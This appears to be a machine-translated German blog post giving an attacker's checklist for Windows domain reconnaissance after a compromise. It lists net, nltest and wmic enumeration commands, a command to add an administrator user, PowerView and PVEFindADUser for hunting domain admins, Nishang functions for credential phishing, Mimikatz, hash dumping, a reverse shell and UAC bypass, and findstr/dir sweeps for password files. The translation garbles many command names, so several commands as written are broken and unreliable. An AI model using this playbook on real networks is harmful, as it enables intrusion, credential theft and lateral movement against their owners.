2024-07-12
한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina
Vier Situationen:
1. Lokaler Benutzer: Benutzer
2. Lokaler Administratorbenutzer: in der Home-Version deaktiviert, nur auf dem Server verfügbar
3. Benutzer innerhalb der Domäne
4. Domänenadministrator
Normale lokale Benutzer können keine Domäneninformationen erhalten
Lokale Administratorbenutzer können ihre Rechte direkt auf Systembenutzer (Benutzer innerhalb der Domäne) übertragen und Informationen innerhalb der Domäne abrufen.
1. Stellen Sie fest, ob die Domäne vorhanden ist:
1. Überprüfen Sie die Domäne: ipconfig/all oder systeminfo oder net config workstation
ipconfig /all: Domain gefunden: hack.com
systeminfo: Die gefundene Domain ist: hack.com
2. Sehen Sie sich den DNS-Host der Domäne an: nslookup-Domänenname (hack.com)
3. Nettozeit/Domäne drei Situationen
Die Domäne ist vorhanden, aber der aktuelle Benutzer ist kein Domänenbenutzer
Eine Domäne ist vorhanden und der aktuelle Benutzer ist ein Domänenbenutzer
Die aktuelle Netzwerkumgebung ist eine Arbeitsgruppe und es existiert keine Domäne
1.net-Ansicht: Domänenliste, Computerliste, angegebene freigegebene Computerressourcen anzeigen: Netzansicht (Computerliste anzeigen) Netzansicht \Computer (angegebene freigegebene Computer anzeigen)
Netzansicht /domain:Domänenname (Hack) (Computerliste anzeigen)
2.net-Benutzer zum Anzeigen lokaler Benutzer: net-Benutzer /domain zum Anzeigen der Anzahl der Benutzer in der Domäne
Benutzer hinzufügen: Netzbenutzername (Administrator) Passwort (123)/hinzufügen
3.net-Nutzung: Verbinden Sie den Computer oder trennen Sie den Computer von der gemeinsam genutzten Ressource und zeigen Sie die Computerverbindungsinformationen an
4. Nettozeit: Verwenden Sie die Zeit, um Computer oder Domänen zu synchronisieren: Nettozeit \ Computer-Nettozeit / Domäne
5.net start: Starten Sie den Dienst oder zeigen Sie den gestarteten Dienst an: net start service
6.Net-Pause: Unterbrechen Sie den laufenden Dienst: Net-Pause-Dienst
7.net continue: Reaktivieren Sie den Dienst: net continue service
8.Net Stop: Stoppen Sie den Windows NT/2000/2003-Dienst: Net Stop-Dienst
9.net-Freigabe: Gemeinsame Ressourcen löschen, erstellen oder anzeigen
10.net-Sitzung: Die Sitzungen des lokalen Computers und der damit verbundenen Clients auflisten oder trennen:
net session //computer (identifiziert den Computer, der aufgelistet oder sitzungsgebunden werden soll)
net session //computer delete (die Sitzung des angegebenen Computers trennen)
11.net localgroup Computergruppe anzeigen (gilt nur für lokal): net localgroup Benutzername
Domänenbenutzer: net localgroup-Benutzername/Domäne
12.net-Gruppe fragt den Namen der Gruppe in der Domäne ab (gilt nur für Domänencontroller): net group /domain
13.net config zeigt die aktuell ausgeführten konfigurierbaren Dienste an oder zeigt die Konfiguration eines Dienstes an und ändert sie (lokal):
net config (zeigt laufende Dienste an) net config services (zeigt eine Liste der Dienste an)
14.net-Computer Computer zur Domänendatenbank hinzufügen oder daraus löschen:
net computer \computername /add oder /del (Computer zur Anmeldedomäne hinzufügen oder löschen)
Wenn „Die Serverliste dieser Arbeitsgruppe ist derzeit nicht verfügbar“ angezeigt wird, aktivieren Sie folgende Dienste: Server, WorkStation, Computerbrowser und schließen Sie die Firewall.
Domäne anzeigen: ipconfig/all oder systeminfo oder net config workstation
Zeigen Sie den DNS-Host der Domäne an: nslookup-Domänenname (hack.com)
Abfragedomäne: Netzansicht /Domäne
Fragen Sie alle Computer in der Domäne ab: Netzansicht /Domäne:Domänenname
Fragen Sie die Liste aller Benutzergruppen in der Domäne ab: Netzgruppe /Domäne
Fragen Sie die Computerliste aller Domänenmitglieder ab: Netzgruppe „Domänencomputer“ /Domäne
Fragen Sie die Passwortinformationen in der Domäne ab: Netzkonten / Domäne
Informationen zur Domänenvertrauensstellung abrufen: nltest /domain_trusts
Zeigen Sie den Namen des Domänencontrollers an: nltest /DCLIST:hack
Sehen Sie sich den Maschinennamen an, suchen Sie die IP, ping/nslookup: ping/nslookup-Domänencontrollername
Manchmal ist Ping hier deaktiviert.
Hostnamen des Domänencontrollers anzeigen: nslookup ‐type=SRV _ldap._tcp
Überprüfen Sie die aktuelle Uhrzeit: Nettozeit /Domäne
Zeigen Sie die Domänencontrollergruppe an: Netzgruppe „Domänencontroller“ /Domäne
1. Fragen Sie Benutzerinformationen in der Domäne ab: net user /domain
2. Lokale Benutzer anzeigen: wmic useraccount get name Domänenbenutzer: wmic useraccount get domain,name
Lokaler Benutzer:
Domänenbenutzer:
3. Überprüfen Sie die vorhandenen Benutzer: dsquery-Benutzer (manchmal wird er möglicherweise nicht ausgeführt und kann nur auf dem Servercomputer ausgeführt werden)
4. Fragen Sie die lokale Administrator-Benutzergruppe ab: net localgroup Administrators
5. Fragen Sie Domänenadministratorbenutzer ab: Netzgruppe „Domänenadministratoren“ /Domäne
6. Fragen Sie die Benutzergruppe des Domänenadministrators ab: Netzgruppe „Enterprise Admins“ /domain
Hier werden zwei Werkzeuge benötigt
Laden Sie das Tool zunächst auf den Server hoch und führen Sie es dann aus
1.PVEFindADUser: PVEFindADUser.exe -current (Pfad beachten) Dieses Tool kann überprüfen, welche Benutzer sich am Computer angemeldet haben, sodass wir den Domänenadministrator finden können
2.PowerView-Skript:
powershell.exe - exec bypass - command "& { import - module .PowerView.ps1; Invoke - UserHunter}"
Überprüfen Sie zunächst die Berechtigungen: Get-ExecutionPolicy
Ändern Sie die Ausführungsrichtlinie: Set-ExecutionPolicy Unrestricted (nur uneingeschränkte Berechtigungen können pow ausführen)
Nishang-Tool (einen Download-Link finden Sie im vorherigen Artikel):
Nachdem Sie es im CS-Verzeichnis abgelegt haben, importieren Sie es direkt: powershell-import nishang/nishang.psm1
Ausführen: Powershell-Befehl
Einige häufig verwendete Befehle:
Check-VM: Überprüfen Sie, ob der Host eine virtuelle Maschine ist
Invoke-CredentialsPhish: Den Benutzer dazu verleiten, sein Passwort einzugeben
Get-WLAN-Keys: WLAN-Informationen
Invoke-Mimikatz: Passwörter abfangen
Get-PassHashes: Hash abrufen
Get-PassHints: Rufen Sie die Kennworthinweisinformationen des Benutzers ab
Invoke-PowerShellTcp: Rebound-Shell
Invoke-PsUACme: UAC umgehen
Remove-Update: Entfernen Sie den Patch
Get-Information: lokale Informationen
Beispiel: Powershell Check-VM
1. Sammeln Sie verschiedene vertrauliche Dateien in bestimmten Verzeichnissen
dir /a /s /bd:"*.txt"
dir /a /s /b C:"*.xlsx"
dir /a /s /bd:"*.md"
dir /a /s /bd:"*.sql"
dir /a /s /bd:"*.pdf"
dir /a /s /bd:"*.docx"
dir /a /s /bd:"*.doc"
dir /a /s /bd:"*conf*"
dir /a /s /bd:"*bak*"
dir /a /s /bd:"*pwd*"
dir /a /s /bd:"*pass*"
dir /a /s /bd:"*login*"
dir /a /s /bd:"*Benutzer*"
2. Sammeln Sie verschiedene Kontokennwörter aus Dateien im angegebenen Verzeichnis
findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si Benutzerkennwort *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si Benutzer *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
Beispiel: dir /a /s /bd:"*.txt"